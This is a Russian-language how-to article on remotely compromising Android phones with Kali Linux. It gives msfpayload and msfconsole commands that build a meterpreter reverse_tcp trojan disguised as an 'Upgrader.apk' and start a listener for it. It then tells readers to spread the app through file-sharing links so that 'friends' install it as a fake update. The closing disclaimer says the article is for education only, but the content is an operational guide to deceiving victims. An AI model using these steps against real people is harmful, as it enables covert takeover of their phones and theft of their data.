Как удаленно взломать Android с помощью Kali

В этой статье мы расскажем, как взломать Android-телефон с помощью Kali. Мы не нашли ни одного туториала по использованию этого хака/эксплоита, поэтому и решили написать его сами. Возможно, вы уже о нем знаете.

Шаг 1. Запустите Кали

• Откройте терминал, и создайте файл Trojan.apk
• Вы можете сделать это, набрав: msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (замените LHOST своим собственным IP-адресом)
• Вы также можете взломать Android через WAN, то есть через Interet, используя ваш общедоступный/внешний IP-адрес в параметре LHOST и пробросом портов (если вам не понятно, что такое «проброс портов» — напишите об этом комментарий).

Шаг 2. Откройте другой терминал

• Пока файл генерируется, откройте другой терминал.
• Загрузите консоль metasploit, набрав: msfconsole

Шаг 3. Установите «прослушивателя»

• После того, как msfconsole запустится (потребуется некоторое время) загрузите multi-handler эксплоит, набрав в консоли: use exploit/multi/handler

• Установите реверсивную полезную нагрузку, набрав: set payload android/meterpreter/reverse_tcp
• Чтобы установить тип L-хоста: установите LHOST 192.168.0.4 (Даже если вы взламываете WAN, указывайте здесь ваш частный/внутренний IP-адрес, а не публичный/внешний).

Шаг 4. Эксплуатируйте!

• Наконец, для запуска «прослушивателя» введите в консоли: exploit.
• Копируйте приложение, которое вы создали (Upgrader.apk) из корневой папки на ваш Android-телефон.

• Затем отправьте его в Dropbox или на любой файлообменник (например: www.speedyshare.com).
• Затем отправьте ссылку, которую этот сервис вам дал, вашим друзьям и эксплуатируйте их телефоны (только в локальной сети, но если вы использовали метод WAN, то вы можете использовать этот эксплоит из любого места в Интернете)

• Пусть жертва установит приложение Upgrader (поскольку он будет думать, что он предназначен для обновления некоторых функций на его телефоне).
• Однако в настройках безопасности Android-телефона опция разрешения на установку приложений из неизвестных источников должна быть включена, чтобы можно было установить ваш троянец.
• И когда он нажимает «Открыть» …

Шаг 5. БУМ!

Появляется вывод meterpreter:

——- ВЗЛОМАН ——

Конец

Обязательно приходите за добавкой! Некоторые почтовые модули, которые работают для Windows, могут не работать в android Например: run killav, persistence (бэкдор) и т.д.

Отказ от ответственности: Эта статья написана только для образовательных целей. Автор или издатель не публиковали эту статью для вредоносных целей. Если читатели хотели бы воспользоваться информацией для личной выгоды, то автор и издатель не несут ответственность за любой причиненный вред или ущерб.